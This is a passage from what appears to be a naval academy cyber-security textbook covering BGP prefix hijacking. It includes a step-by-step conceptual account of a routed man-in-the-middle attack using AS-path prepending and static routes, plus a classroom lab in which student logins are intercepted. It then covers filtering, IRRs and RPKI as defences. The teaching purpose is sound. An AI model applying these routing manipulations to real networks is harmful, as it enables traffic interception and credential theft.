and ASN. Instead, AS network operators must trust the network reachability information that other ASes provide,
specifically, where a prefix originates and who it has been allocated to. Without trusting this information, it is impossible to
identify how to reach other networks of interest. This mutual trust defines the nature of Internet routing.
Hopefully, it is clear this issue is of great concern. The security of Internet routing depends on the accuracy, integrity, and
availability of the association between ASNs and the network prefixes they own and advertise. If this information is lost,
corrupted, or destroyed the Internet will fail to function as a whole.
At the start of the Part II: The Network in Chapter 11, we saw one example of how devastating this can be. YouTube was
taken off the Internet by the Pakistan Telecommunication Authority on Sunday, February 4 th, 2008 for one hour. Similar to
the Professional Teaching Association’s actions in Security Exercise 17, the Pakistan Telecommunication Authority
announced a more specific network prefix which contained YouTube’s IP address space. The Pakistan Telecommunication
Authority’s more specific advertisement created a ‘black hole’ where the majority of Internet traffic destined for YouTube
423
was misdirected. Fortunately, their mistake was not malicious in nature, but that does not mean others will not be in the
future.
If Internet routing is so vulnerable, who or what keeps the Internet up and running? The successful reliable operation of
Internet routing is a testament to the many AS network operators responsible for inter-domain routing. In addition, many
others are heavily invested in the development of the Internet and its safe and effective operation. Specifically, the Internet
Engineering Task Force (IETF), an international collection of academic researchers, network operators, equipment
manufacturers, and others has made it their sole mission to simply “make the Internet work better.” To do this, these
volunteers produce engineering documents called Requests For Comments (RFCs) that define the operation of the Internet’s
protocols. Through open dialogue, technical competence, protocol ownership, rough consensus and running code they work
hard to guide the technical architecture and keep the Internet up and running daily. To learn more about the IETF, see
http://www.ietf.org.
3. MidTube is Back! Speaking of up and running, it looks like MidTube is back! Let’s break for Part 1 and Part 2 of the
Security Exercise. After these parts are complete, we’ll return to your regularly scheduled lecture.
Security Exercise 18: Part 1 and Part 2
II. Stealing the Internet: Route Attribute Manipulation
1. Sir/Ma’am, Please Give Me My Password Back Prof. Evil and the PTA are back at their old tricks again! This time,
rather than simply shutting down MidTube, they were able to place themselves between you and the MidTube webserver.
From that vantage point, they observed all traffic destined for 17.17.200.0/24 and identified those who were enjoying
themselves rather than paying attention in class. Let’s take a closer look at how your instructor was able to recover your
MidTube username and password and how BGP enabled this.
Practice Problem 18.3
Consider the network diagram and BGP route announcement from Router 3 of AS2003 below. Assuming no local
preferences are set, for every AS, draw the path that AS would select to reach 17.17.200.2 beginning with the AS router
and ending with the MidTube webserver.
16.16.16.0/30
.2
AS 40
21.200.3.0/24
R40
.2
AS 20
.1
15.15.15.0/30
.1
.2
Network: 17.17.200.0/25
12.12.12.0/30
AS-Path: 2003-60-2005
R20
www.pta.net
21.200.3.2
13.13.13.0/30
.2
3.3.3.0/30
AS 2016
14.14.14.0/30
R30
.1
4.4.4.0/24
AS 2003
AS 30
.1
7.7.7.0/30
R16
RC
R3
.2
.2
18.18.18.0/30
.1
.2
.2
.1
.1
.2
.2
.2
.1
8.8.8.0/30
9.9.9.0/30
20.20.20.0/30
Other USNA
Networks
Network: 17.17.200.0/24
AS-Path: 2005
.1
.2
AS 50
2.2.2.0/29
RA
.1
R60 AS 60
.2
.1
R50
.1
.2
.1
19.19.19.0/30
R5
.1
17.17.200.0/24
.10
?.?.?.?/??
AS 2005
424
www.midtube.com
17.17.200.2
What path will AS60 select in order to reach 17.17.200.2?
Solution:
Why would AS60 choose this path?
Solution:
What does the attacker gain by prepending this AS60 to their route announcement?
Solution:
What path will AS2005 select in order to reach 17.17.200.2?
Solution:
Why would AS2005 choose this path?
Solution:
What does the attacker gain by prepending this AS2005 to their route announcement?
Solution:
What additional actions must the attacker take in order to complete the MITM attack?
Solution:
Finally, what path will all packets leaving AS2016 take in order to reach the MidTube webserver at 17.17.200.2?
Solution:
There are several elements of this routed wide area MITM attack that are important to understand:35
First and foremost, in order for it to work, there is a portion of the Internet that must be given up as the back path (i.e., the
‘correct’ path) to the target. In this example both AS60 and AS2005 fulfill this role and are deliberately chosen by the PTA
to let the victim eventually reach their destination. Therefore, all traffic originating from AS60 and AS2005 would not be
forced through AS2003 as opposed to the other ASes across the EC310 internet. Similarly, on the real Internet, an attacker
needs to plan his back path appropriately. Surprisingly, there are actually a small number of ASes to choose from. Although
the Internet continues to grow daily, the number of ASes between any set of prefixes is still relatively small. As of October
2014, the average AS path length was 3.7891. That is, the ‘diameter’ of the Internet is approximately four ASes wide.
Second, this attack combines the use of a more specific network prefix with the modification of BGP route attributes to
control the direction of traffic. The PTA is intentionally prepending (i.e., put in front) its ASN to the chosen back path to
take advantage of a distinct feature of the BGP path selection algorithm. An AS will not accept a route that includes its own
35
Originally proposed and demonstrated live at DEFCON 16 on 10 August, 2008 by Anton (Tony) Kapela and Alex Pilosov.
See https://www.youtube.com/watch?v=S0BM6aB90n8 for more details.
425
ASN in the path. Recall from Chapter 17 this feature of BGP is intended to prevent routing loops. Here, it is twisted for
malicious purposes. Of course once you understand how a lock operates, you realize there is more than a key that can open a
door.
Third, to complete the MITM attack, the attacker must also place a static route within their AS to forward traffic to the final
destination. It is not enough to simply redirect all traffic to the attacker’s AS. The attacker has to connect the forward path
to the back path of the final destination. A static route provides this connection. A static route is a manually entry into a
router about the location of a network. When a router learns about the same network through multiple sources, like the Open
Shortest Path First (OSPF) protocol and distance vector routing, a static route has the highest priority. Therefore, the router
will use the static route over the other learned routes to reach the same network.
Fourth, while certainly clever, there is a large signature associated with this kind of attack due to its potential global impact
across the Internet. If it has a significant effect on consumers or providers, network operators often deal with it as soon as
possible. Thus, attacks typically last from several minutes to hours. Still, occurrences are not infrequent. A recent report
commissioned by the FCC estimated that route hijackings or similar BGP incidents occur once or twice per month, but
whether or not the hacker’s intentions are malicious is very difficult to ascertain.36 Interestingly, BGP attacks of a smaller
scale (i.e., dealing with only a handful of prefixes) generally go unnoticed. For example, email spammers commonly hijack
IP address space to send their unwanted traffic and then disappear. Various techniques have been proposed on how to hide as
the man in the middle during a route wide area attack, but the technical details of their implementation are beyond the scope
of this course.
Finally, the astute midshipmen may realize the aforementioned MITM attack only redirects traffic in the forward direction.
That is, traffic leaving AS2016 destined for the MidTube webserver would be forced through AS2003 while traffic leaving
AS2005 destined for AS2016 would not be forced through AS2003. The MidTube webserver will respond to all web
requests via a separate path chosen by Router 5 of AS2005. For brevity, it is left to the reader to determine the appropriate
BGP route announcement that AS2003 should make to intercept traffic in the reverse direction. See Security Exercise 18
extra credit opportunities for details.
2. Why Does This Work? In addition to the two reasons mentioned previously, there is one more reason why this type of
MITM attack is possible in BGP:
There is no method within BGP to authenticate the route attributes provided by an AS.
This point bears repeating: BGP does not provide a mechanism to authenticate the route attributes associated with the
announcements of an AS. This means that an AS can announce whatever attributes it would like about any network prefix,
regardless of the prefixes’ origin, including the AS path length.
As before, this has a significant impact on the security of Internet routing. Not only is it possible for an AS to originate a
network prefix without authorization, but any AS along the path can modify the attributes associated with a network prefix at
any point. Therefore, the security of Internet routing depends on the ability to authenticate the route attributes provided by
an AS.
Practice Problem 18.4
What makes route attribute manipulation possible in BGP?
Solution:
What is required in order to secure Internet routing from route attribute manipulation?
Solution:
In some contexts modification of route attributes is used for good. For example, inflating the AS path length of a network
prefix is a common technique used in traffic engineering. However, as we have just seen, it can also be used for malicious
purposes. This leads us to the final question of the networking section: What solutions are available to secure Internet
routing?
III. The Path Towards Secure Internet Routing
1. The Problem As previously mentioned, the primary vulnerability of the Internet routing system is a lack of means to
authenticate the ASNs, network prefixes, and route attributes provided by others. Without an objective baseline to compare
36
See Secure BGP Deployment Final Report by the FCC’s CSRIC III, Working Group 6, March, 2013 for more details.
426
against, network operators are left to fend for themselves as to whom and what they believe. This is made more difficult by a
number of other issues:
First, compounding the problem is the fact that the Internet routing system grows on a daily basis. The exponential growth of
the BGP IPv4 routing table is illustrated in Figure 1. The number of active BGP entries (i.e., currently advertised network
prefixes) is on the vertical axis and the date in years is on the horizontal axis. Consider the number of prefixes advertised
today (~520,000) relative to the number of prefixes advertised in 1999 (~70,000). Such nonlinear growth makes the
challenge to sort fact from fiction immense, especially given that any one of these prefixes may be malicious in nature.
Figure 1 – The number of active BGP entries versus the date in years.
Second, exacerbating things further is that fact that the number of ASes in the Internet has also increased linearly over time.
This rate of increase is evidenced by the positive slope of the line in Figure 2. The number of unique ASes is on the vertical
axis and the date in years is on the horizontal axis. Again, when comparing the number of ASes today (~48,660) relative to
the number of ASes in 1999 (~4,400) there is an order of magnitude difference. As more ASes are introduced every day, the
challenge to distinguish between true and false advertised information grows more difficult. If even one AS is successful in
sending malicious information, it could alter the flow of traffic across the entire Internet.
Figure 2 – The number of unique ASes versus the date in years.
Third, who is responsible for the Internet anyways? While the organizations (IANA, IETF, etc.) we have discussed thus far
are heavily involved in making the Internet function better, none of them have the authority to administer punishment for
abuse of the network. Part of the celebrated history of the Internet is its free and open nature in which anyone can connect
and share with others. Moreover, many non-profit organizations, private corporations, and governments wish for it to remain
a free domain and may reject any security solution which does not preserve these principles.
Lastly, when considering any security vulnerability, the financial cost to fix the problem is a considerable factor in driving
how quickly any solution may be adopted. It is one thing to tell all AS network operators to secure their networks, but it is an
entirely different to determine who is going to pay for it. Unfortunately, the full details of these policy, financial, and
governmental issues are outside the scope of this course, but nevertheless they have a significant impact on the security of
Internet routing.
427
2. The Solution There are three technical solutions that AS network operators can use right now to combat the issues which
have been identified in this chapter: 1) Filtering, 2) Internet Routing Registries, and 3) Resource Public Key Infrastructure
(RPKI). 373839 BGP security remains an active area of research and alternative solutions may be available in the future.
Filtering. Best current practices for AS network operators dictate the use of filters at AS borders to reject suspicious route
announcements or alter malicious route attributes. Filters are manually established based on the routing policies of an
organization and are commonly used to: 1) prevent private IP addresses and other special use addresses from being routed
across the Internet; 2) remove routes with exceptionally long AS paths; 3) limit the number of network prefixes introduced in
the global BGP routing table by their the mask length (e.g., do not advertise a network greater than /24); along with many
other purposes. ISPs have the ability to filter their customer’s routes because they often have direct knowledge of what IP
addresses they have allocated to their customers and which ASes should be announcing their prefixes. Information from stub
ASes can be readily authenticated because they should have a limited number of advertisements and exchange this
information with only one ISP. The real trouble is introduced not at the ‘edge’ of the Internet with stub ASes, but from
multihomed and transit ASes which are farther away from one another. That is, it is very hard for an ISP to filter the routes
of another ISP that has their own set of customers, policy constraints, and geographic concerns. 40
It is important to understand that filtering has both a business cost and computational cost associated with it. If an ISP filters
too aggressively, it may prevent customers from reaching legitimate destinations. Unhappy customers could lead to a loss of
revenue. There is also an intensive amount of manual labor required to create and maintain these filters, which also costs an
organization time and money. The routers performing the filtering must also be able to store all of the policies of an
organization along with their routing tables and respond to dynamic changes in the Internet’s topology. As an example of
how frequently Internet routing data can change, consider the peak BGP update rate over a seven-day period in October 2014
shown in Figure 3. At its peak, over 4000 BGP update messages and over 6000 BGP route withdrawals were sent per
second. Each update or withdrawal could cause the BGP path selection algorithm to run against the organization’s policies
and consume a large amount of CPU processing time. To help meet this significant computational demand, routers use a
special type of memory called Ternary Content Addressable Memory (TCAM) which is much more expensive than the
common RAM which we learned about in Chapter 1. Thus, the cost of the individual router increases as the demands of
filtering expands. Hopefully it is clear the consequences of filtering are significant and not a trivial matter to implement or
maintain.
Figure 3 – Peak prefix update rate per second versus the date in years.
Furthermore, for filtering to work effectively, everyone must do it and do it with an equally strict level of scrutiny. How
likely do think it is that all ISPs in all countries will meet the same high standard? If even one falls short, or one router in one
ISP is compromised, a malicious routing entry can corrupt the global BGP table.
Internet Routing Registries. The first efforts to establish a baseline for the Internet routing system are the Internet Routing
Registries. The idea behind them is very simple. They are repositories of the IP prefixes, ASNs, routing policy, network
topology, and human points of contact for those ASes which choose to register their information. These databases can be
37
As proposed in A Survey of BGP Security Issues and Solutions by Bulter et al., January, 2010.
As proposed in the Secure BGP Deployment Final Report by the FCC’s CSRIC III, Working Group 6, March, 2013.
39
See RFC 6480 (http://tools.ietf.org/html/rfc6480) for more details.
40
See See “How Egypt did (and your government could) shut down the Internet” for more details
(http://arstechnica.com/tech-policy/2011/01/how-egypt-or-how-your-government-could-shut-down-the-internet/)
38
428
queried by any AS through an application separate from BGP to authenticate the routing information received via BGP.
ASes may use this information to construct their BGP filters in order to screen malicious or erroneous advertisements from
others. Often ISPs will require their customers to register their prefixes in an IRR before the ISP will even announce the
customer’s prefix onto the Internet. Again, this solution works well at the ‘edge’ of the Internet but becomes increasingly
difficult when stub ASes are not considered.
While this method may be effective, the downside is that these registries are only effective if the registry data is secure,
complete, and accurate, which is currently not guaranteed. 41 Additionally, even the Regional Internet Registries (RIRs) do
not always have accurate records of the organizations and their allocated IP addresses. Over time businesses change
ownership, sub-divide, or enter bankruptcy, invalidating the original IP address allocation data. Additionally, because an
organization’s routing policy and network topology is considered private property, organizations do not have an incentive to
update their information in either the IRRs or with the RIRs. For example, a company like Netflix aims to keep the
information about how it connects with other ISPs private to maintain an advantage over its competitors. Thus, they are
unlikely to updating their IRR or RIR information.
Resource Public Key Infrastructure (RPKI). Since the security of Internet routing necessitates secure, complete, and
accurate routing information, the most current ideal solution is the Resource Public Key Infrastructure (RPKI). This was
recently made available by all of the RIRs in 2011.42 Similar to the IRRs, RPKI is a repository of Internet routing
information. The key difference is that it uses the X.509 certificate system to provide cryptographic assurance of:
1.
2.
The association between an ASN and the IP prefixes it has been allocated.
The association between an ASN and the IP prefixes it is authorized to originate.
This is the same idea as when you establish a secure connection with a website. When the lock closes in your browser (
) and you establish a secure connection with a website, you know the public key that was used to transfer a
symmetric encryption key was done using the public key that belongs to a particular domain name. With RPKI though a
router can know if the IP prefixes that are advertised by an ASN may be originated by that ASN. This point bears repeating:
RPKI only provides cryptographic assurance of the association between 1) an ASN and the IP prefixes it has been
allocated and 2) an ASN and the IP prefixes it is authorized to originate. It accomplishes the second objective through
Route Origin Authorizations (ROAs) which attest to what ASN can originate an IP prefix(es). ROAs are digitally signed by
the prefix owner to certify which ASN may originate that IP address space. Dissimilar to the IRRs, the timeliness of the
information in the RPKI database can be validated by checking a certificate’s expiration date. In fact, there is a direct
mechanism for authorized address holders to revoke certifications to preserve the integrity of the database.
More importantly, notice what is absent in RPKI. There is nothing in RPKI which validates the route attributes, including the
AS path, associated with a BGP route announcement from an AS. Nor does it provide certainty that the AS which has
registered their information used the correct ASN or set of prefixes. Nor does it provide network topology information or
human points of contact as with IRRs. Lastly, it does not mandate that network operators use this information when
constructing their filters. How RPKI is applied is entirely dependent on what AS network operators choose to do with the
information available.
The hope is, as trust in RPKI increases, network operators will use it more often to certify their IP resources while furthering
its use in their networks. However, as with any new large scale and complex system, new vulnerabilities may be introduced.
For example, at any time any authorized address holder can revoke the certificates of those whom they have sub-allocated
their address space to. Initially, this method may appear like a smart and convenient method for an ISP to control negligent
or irresponsible customer behavior. However, if an ISP or a country wanted to restrict Internet access for a group of people,
abuse of the RPKI Certificate Revocation List (CRL) could provide a way of doing so.
Practice Problem 18.5
Briefly describe two technical solutions to prevent manipulation of the Internet routing system.
Solution:
Briefly describe the negative and positive consequences of these two solutions for secure Internet routing.
Solution:
41
42
A Survey of BGP Security Issues and Solutions by Bulter et al., January, 2010.
Some RIRs began offering RPKI as early as
429
3. See For Yourself
At this point, we’ll head out on to the real Internet and wrap up Part 3 of the Security Exercise. After the Security Exercise is
done, we’ll complete your regularly scheduled lecture.
Security Exercise 18: Part 3
IV. Conclusion
Communication is an inherently insecure process. It is never a question how to make communication perfectly secure, but it
is a question of how to mitigate the risks to an acceptable level for the parties involved. To help make this fundamental
principle clear, let’s strip away all the complexity in computer communications that we have introduced to date. Hopefully,
we have shown you that complexity (e.g., routers, protocols, networks addressing schemes, etc.) can create vulnerabilities.
However, even the most simplistic forms of communication are still inherently insecure, but to understand how requires a bit
more understanding of the how the electromagnetic spectrum works. That is, before we can become a locksmith (of wireless
communication), we need to know a bit more about how the lock (the electromagnetic spectrum) operates.
430
Problems
1.
What is an IP prefix?
a. The network ID.
b. 200.15.78.128/25
c. The range of IP addresses assigned to a network.
d. All of the above.
2.
As an Autonomous System (AS), what is the difference between originating an IP prefix and being
allocated an IP prefix?
3.
What are Border Gateway Protocol (BGP) route attributes and what are they used for in BGP?
4.
What defines the nature of Internet routing?
5.
Two types of attacks were discussed in Chapter 18: 1) route hijacking and 2) the routed wide area
MITM attack. What is the difference in how BGP is exploited in each attack?
6.
What information is required to secure Internet routing?
7.
What is the most current ideal solution to secure Internet routing?
8.
Who is responsible for implementing the technical solutions to secure Internet routing proposed in
Chapter 18?
9.
What makes securing the Internet routing so difficult today and in the future?
10.
Filtering was mentioned as one of the technical solutions to a routed wide area Man-In-The-Middle
(MITM) attack. What is one negative consequence of filtering?
11.
What must be true for filtering to be effective in securing Internet routing?
12.
Why is filtering so difficult to implement and maintain?
13.
How is RPKI different than the Internet Routing Registries (IRRs)?
14.
RPKI was proposed as one technical solution to secure Internet routing. It uses cryptography to provide
assurance of the association between:
1) ________________________________ and _____________________________________
2) ________________________________ and _____________________________________
15.
What tool does RPKI provide to attest to what ASNs can originate which IP prefixes?
16.
Even if using filtering, the IRRs, and RPKI, what aspect of BGP is still vulnerable to manipulation?
17.
What is the fundamental principle of communication as it relates to security?
18.
What IP prefix and AS path should Router 50 announce to hijack the Midtrest webserver?
431
19.
Consider the network diagram and BGP route announcement from Router 50 of AS50 below. AS10 is a
multihomed AS. Assuming no local preferences are set, for every AS, draw the path that AS would select to reach
30.31.51.10 beginning with the AS router and ending with the Midtrest webserver.
AS 20
1.2.3.0/24
R20
1.1.1.0/30
R10
AS 40
www.midtrest.com
AS 10
4.4.4.0/30
2.2.2.0/30
R30
5.5.5.0/30
7.7.7.0/30
30.31.51.10
3.3.3.0/30
R40
8.8.8.0/30
30.31.32.0/19
AS 30
AS 50
9.9.9.0/30
R50
10.10.10.0/30
AS 70
R70
Network: 30.31.48.0/20
AS-Path: 50-70-40
432
Network: 30.31.32.0/19
AS-Path: 40
Security Exercise 18
Part 1: Initial Setup
Now that we understand how the Internet is put together, let’s take a closer
look at how it can be pulled apart.
1. Set-Up
Yes, I take Movemeber very seriously, and
if you seriously want to be an Astronaut,
you should know who I am and what I do
now. Remember, ’68 is great!
Equipment needed:
 A printed or electronic copy of this security exercise.
o If printed, separate the network diagram and answer sheet at the
back of this exercise and have them ready to fill in.
 Your issued Laptop.
o Ensure Chrome or Firefox is installed on your Windows
computer.
o Turn up the volume on your computer.
o Turn off the wireless adapter.
o Connect the blue Ethernet cable at your desk to your issued laptop.
o Wait for an IP address to be assigned to your LAN interface.
o Verify by pressing the Windows Orb key and in the program
search
bar, type
cmd
Hit enter to launch the Windows terminal and then, at the command prompt, execute
ipconfig
Now, your screen should look similar to the figure below. Your Ethernet adapter should be assigned an IP
address of 192.168.XX.YYY, where XX is your classroom number and YYY is a number between 101
and 254. If not, notify your instructor or lab technician.
433
Part 2: We Want MidTube!
1. MidTube is Back!
When we last left off in SX#17, MidTube had been shut down by the Professional Teaching Association (PTA) at the request
of Prof. Evil. This ban would not to be lifted until a thorough review of the Rectabular Excrusion Bracket was accomplished
by all EC310 midshipmen. To pull off their block, the PTA advertised a more specific network prefix which contained the
address of the MidTube webserver. This forced all traffic destined for MidTube across the EC310 internet to be redirected to
AS2003. As you just learned in lecture this type of attack is commonly referred to as prefix hijacking.
Question 1: What feature about BGP makes it possible for the PTA to hijack MidTube?
Question 2: What is required to secure Internet routing from prefix hijacking?
Have no fear. The Superintendent heard word from the Brigade of Prof. Evil’s heartless actions. In fact, several bitter angry
midshipmen stormed his office over the weekend to complain; and, as you well know, if there is one thing we cannot have
the Naval Academy it is cynical midshipmen. Therefore, the Superintendent quickly took action and directed Prof. Evil to
restore MidTube immediately or face disciplinary action. Thwarted yet again, Prof. Evil reluctantly agreed and contacted the
PTA to remove the block. Now, once again, for your viewing pleasure, visit http://www.midtube.com.
 Access the website www.midtube.com by opening Firefox or Chrome on your Windows computer (i.e., not your
Cyber2 VM) and navigating to the website address.
 Log in by creating a username and password of your choice (do not use a username or password you would not like
exposed).
 Browse the website to see what information is available.
Question 3: Gasp… what shocking event just happened?
Question 4: Perform a tracert (do not forget the –d option) to the MidTube webserver. List the IP addresses in the order
they appear on your answer sheet. Is this the correct route to the MidTube webserver?
2. The PTA’s Back!
It seems Prof. Evil and the PTA are back to their old tricks again! This time, rather than simply shut down MidTube, they
were able to place themselves in between you and the MidTube webserver. From that vantage point they could observe all
traffic destined for 17.17.200.0/24 and identify those who were enjoying themselves rather than paying attention in
class. To do this, the PTA made the following announcement from Router 3 in AS2003:
Question 5: Assuming no local preferences are set and for every AS in the EC310 internet, on your network diagram draw
the path each AS would select to reach 17.17.200.2 beginning from the AS router and ending with the MidTube
webserver.
The correct answer to Question 5 will be explained in detail by your instructor, but the astute midshipmen may realize the
PTA’s actions only redirects traffic in the forward direction. That is, traffic leaving AS2016 destined for the MidTube
webserver would be forced through AS2003 but traffic leaving AS2005 destined for AS2016 would not be forced through
AS2003. The MidTube webserver will respond to all web requests via a separate path chosen by Router 5 of AS2005.
434
Question 6 (Extra Credit): What announcement(s) should the PTA use in order to become the MITM in the reverse
direction? (Hint: Consider the Initial Setup instructions of Security Exercise 17 and 18)
3. Disconnect from the EC310 Internet



Close all tabs in Chrome or Firefox.
Disconnect the blue Ethernet cable.
Turn on your wireless adapter.
STOP! We’ll now return to your regularly scheduled lecture.
Part 3: The Real Internet
While it is fun playing around in the EC310 internet, it is not enough to see all the parts and pieces that make the real Internet
work. Let’s get to know some of the organizations we mentioned in lecture that are responsible for the safe and effective
operation of the real Internet. Let’s also take a closer look at the solutions available to secure Internet routing.
1. Internet Routing Registries
Recall from Chapter 18 the Internet Routing Registries (IRRs) house important information about the IP prefixes, ASNs,
routing policy, network topology and human points of contact of registered ASes.
 Access the website www.irr.net in either Firefox or Chrome on your Windows computer (i.e., not your Cyber2
VM) via the USNA network (i.e., not the EC310 internet).
 Click the link for an ‘Overview of the IRR’
Question 7: What do the IRRs provide?
Question 8: When did they come about?

Click the link for a ‘List of Routing Registries’
Question 9: How many routing registries are there?


Click the link for ‘FAQ: Why Use a Routing Registry?’
Read the first email shown from oberman@es.net
Question 10: Why use a routing registry?
Question 11: Do people trust the information in the IRR? When is this a problem?
2. Regional Internet Registries and Resource Public Key Infrastructure
One of the most effective solutions against false route injection into the Internet routing system is the use of Resource Public
Key Infrastructure (RPKI). Just within the last few years, all Regional Internet Registries (RIRs) began offering RPKI.
 Access the website https://www.arin.net/resources/rpki/index.html in either Firefox or Chrome on your Windows
computer.
 Watch the video ‘Resource Certification Explained’ to learn more about how RPKI works.
Question 12: In RPKI, what is used to verify that an IP address has been allocated to a specific entity?
Question 13: In RPKI, what is used to verify that an AS may originate a specific network prefix?
Question 14: What is one thing RPKI does not provide assurance of?
Question 15: What must AS network operators do with the data from RPKI to secure Internet routing?
STOP! We’ll now complete your regularly scheduled lecture.
435
436
Security Exercise 18 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6 (Extra Credit):
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
437
Network: _____._____._____._____ /____
c)
.1
.2
4.4.4.0/24
18.18.18.0/30
.1
AS 30
.2
.1
16.16.16.0/30
.1
.2
.2
.2
www.pta.net
21.200.3.2
AS 2003
Network: 17.17.200.0/24
AS-Path: 2005
R60 AS 60
14.14.14.0/30
.1
21.200.3.0/24
Network: 21.200.3.0/24
AS-Path: 2003
R3
SX18
ONLY
Network: _____._____._____._____ /____
.1
.2
.2
20.20.20.0/30
.1
R5
17.17.200.2
www.midtube.com
17.17.200.0/24
AS 2005
.2
AS-Path: _________________________
13.13.13.0/30
9.9.9.0/30
19.19.19.0/30
R30
15.15.15.0/30
EC310 Security Exercise 17 & 18
.2
.1
.1
8.8.8.0/30
.2
.2
AS 40
R40
.1
b)
7.7.7.0/30
AS 50
R50
a)
AS-Path: _________________________
Network: _____._____._____._____ /____
.2
12.12.12.0/30
Network: _____._____._____._____ /____
RA
AS-Path: ____________________________
.1
.2
Other USNA
Networks
R16
3.3.3.0/30
.1
AS-Path: _________________________
AS 20
.1
AS 2016
R20
RC
.2
2.2.2.0/29
.1
.10
?.?.?.?/??
438
Part III: Wireless
In this, the final module of the course, you will be introduced to how digital information,in the form of
bits, is moved from one location to another through free space−that is, without using wires or cables.
However, while the ability to move information through free space makes communication more
convenient, it also makes communication more susceptible to eavesdropping or jamming. Therefore, we
will also explore the vulnerabilities of wireless communication.
439
440
Chapter 19: Communications Systems, EM Spectrum, and Signals
Objectives:
(a) Describe the four components of a communications system and the impact on security of using free space as a
communication medium.
(b) Identify communication applications for various bands of the electromagnetic spectrum ranging from extremely low
frequency (ELF) to extremely high frequency (EHF).
(c) Define the term signal and explain the basic properties of a sinusoidal electromagnetic signal (period, frequency,
wavelength, phase, and amplitude) and describe their mathematical relationship.
(d) Plot simple (sinusoidal) electromagnetic signals in the time and frequency domains; interpret time- and frequency-domain
plots to determine the associated signals.
(e) Define and calculate bandwidth of transmitted signals.
Connection to Cyber Security
This chapter marks the beginning of the third part of EC310. In Part I: The Host, we examined how data are stored and
accessed in memory at the machine level and examined the resulting threats against a specific computer, focusing on the
buffer overflow attack. In Part II: Networks, we concentrated on understanding how the Internet works and how networks are
just as important and vulnerable as the individual host computers that reside on them. In Part III: Wireless, we will gain an
appreciation for communicating in an environment without physical connections to every computer, router, etc. in the
network, leading up to how wireless communication systems can be hacked.
(Graphic by Dane Brown)
I.
Communications Systems and the Electromagnetic Spectrum
A. Communication Systems
The purpose of a communications system is to transmit information over a distance. This “information” could be audio (such
as speech or music), video, sensor data (temperature, pressure), or other data (e.g., text, stock prices, photos, etc.). “Over a
distance” may mean from here to the other side of the world via a satellite, or from one computer to another in a network, or
from your computer’s CPU to its RAM.
Any communications system consists of the following basic components, which are shown in the following figure. There are
four main components:
 Transmitter – converts information into an electronic form suitable for the channel
 Channel – the physical medium through which an electronic signal travels
441


o e.g., wire, fiber-optic cable, free space (i.e., air), water (sonar)
Receiver – converts the received signal back to a usable form
Noise – undesired, random corrupting energy
The information is passed to the transmitter. The receiver produces a “recovered” information signal, which may not be the
same signal that was transmitted. This is because a significant, though undesired, occurrence in all communication systems is
noise, which is random energy that enters the system and interferes with (corrupts) the transmitted message. If the noise is
strong enough, the information signal may not get through at all. You’ve all heard what noise sounds like, for example on a
telephone (we sometimes refer to it as static). If the static is very powerful you will only hear a small portion (or none) of the
words that are spoken to you. This relationship between the useful signal and corrupting noise will be formalized in chapter
23.
Noise can be divided into two broad categories:

External noise is noise introduced into the transmission channel from outside sources. Examples include:
o Industrial noise arising from man-made electrical sources (e.g., motors, generators, switches)
o Atmospheric noise due to naturally occurring disturbances in earth’s atmosphere (e.g., lightning)
o Extraterrestrial noise due to solar and cosmic activity.

Internal noise is noise introduced by the electronics inside the receiver itself. Examples include:
o Thermal noise
o Semiconductor noise
For the third block of this course, we will focus on communications systems in which our channel or medium is free space.
Free space can refer to a perfect vacuum (as you might recall from physics), or to the air (as opposed to transmission through
a wire or other material). Signals that propagate in free space are often referred to as “wireless” or “over-the-air” signals, and
all signals in free space are part of the electromagnetic spectrum. With wireless routers and satellites part of almost every
network, especially in military applications, understanding the electromagnetic spectrum is critical to cyber security.
B. Electromagnetic Spectrum
The electromagnetic spectrum is the range of all possible frequencies of electromagnetic waves. The spectrum is broken into
regions/ranges and classified by frequency and/or wavelength. The frequency (f ) of an electromagnetic wave is a measure of
how rapidly it oscillates. Frequency is measured in Hertz (1 Hz = 1 cycle/sec).
The period (T) of an electromagnetic wave is the length of time required to complete one cycle. The period is measured in
seconds, and is the reciprocal of the frequency in Hz (T = 1/f). Wavelength (λ) is the physical distance between the peaks of
one cycle of a transmitted wave as it moves through the medium, and is measured in meters (m). The following plots show an
EM wave’s voltage as a function of time (left plot), and as a function of distance (right plot).
For electromagnetic waves traveling in air (or vacuum), we will assume that they travel at the speed of light (c)
which is roughly 3 x 108 m/s. The wavelength is inversely proportional to the frequency, and is related to the speed of light
by:
c
l= .
f
442
The specific bands of frequencies in the EM spectrum is shown in the following figure. In this course, we are concerned with
communications in the frequency ranges from ELF to EHF.
Later in the course, you will see that antennas are needed to transmit information using the EM spectrum. The following
figure should give you an idea of the relationship between wavelength size (which will determine antenna size) and
transmission frequency throughout the Electromagnetic Spectrum.
You should be familiar with the frequency ranges for communications from ELF to EHF.
 Extremely low frequency (ELF) 30 Hz to 300 Hz. Power line frequencies and low end of human audio.
 Voice frequency (VF) 300 Hz to 3000 Hz. Typical range associated with human voice.
 Very low frequency (VLF) 3 kHz to 30 kHz. Used for communications with submerged submarines.
 Low frequency (LF) 30 kHz to 300 kHz. Long range radio navigation.
 Medium frequency (MF) 300 kHz to 3000 kHz. AM radio and long range communication.
 High frequency (HF) 3 MHz to 30 MHz. Known as “short wave”, used by two-way radio.
 Very high frequency (VHF) 30 MHz to 300 MHz. Radio communications and FM radio.
 Ultra high frequency (UHF) 300 MHz to 3000 MHz. TV, military and cell phones.
 Super high frequency (SHF) 3 GHz to 30 GHz. Microwave. Satellite communications and radar.
 Extremely high frequency (EHF) 30 GHz to 300 GHz. Satellite communications.
Practice Problem 19.1
What is the wavelength of an FM radio station whose broadcast frequency is 101.1 MHz?
Practice Problem 19.2
What is the frequency of a signal whose wavelength is 8 cm?
Bandwidth Bandwidth is the amount of the frequency spectrum occupied by a signal regardless of where it is in the
spectrum. It is the difference between the upper and lower frequency limits of the signal. Typical bandwidths:
 AM Radio Station – 10 kHz
 FM Radio Station – 180 kHz
 Broadcast TV Station – 6 MHz
443
If a signal occupies the range of frequencies between approximately 300 Hz and 3000 Hz. The following figure demonstrates
that for that signal, it’s bandwidth would be 2700 Hz.
Federal Communications Commission (FCC)
The electromagnetic spectrum is crowded; everyone wants some bandwidth. The FCC was established by the
Communications Act of 1934 to regulate interstate and foreign communication. The FCC:
 Allocates bands of frequencies for specific uses
 Sets limitations on broadcast power
 Monitors broadcasts to detect unlicensed operations and technical violations
